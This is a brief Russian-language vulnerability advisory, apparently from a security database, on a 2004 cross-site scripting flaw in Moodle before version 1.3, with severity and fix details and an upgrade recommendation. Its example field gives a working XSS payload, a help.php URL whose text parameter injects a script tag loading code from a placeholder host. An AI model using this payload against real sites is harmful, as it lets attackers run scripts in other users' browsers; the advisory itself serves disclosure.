Межсайтовый скриптинг в Moodle
| Дата публикации: | 02.05.2004 |
| Всего просмотров: | 1160 |
| Опасность: | Низкая |
| Наличие исправления: | Да |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | Удаленная |
| Воздействие: | Межсайтовый скриптинг |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | Moodle 1.2.x |
| Уязвимые версии: Moodle до версии 1.3
Описание: Уязвимость обнаружена в Moodle. Удаленный пользователь может выполнить XSS нападение. Пример/Эксплоит:
http://{some_moodle_site}/help.php?text=<script src={url_to_script_to_execute}></script>
URL производителя: http://www.moodle.org/ Решение:Установите обновленную версию программы: http://moodle.org/mod/resource/view.php?id=8 |
|
| Ссылки: | Cross Site Scripting in Moodle < 1.3 |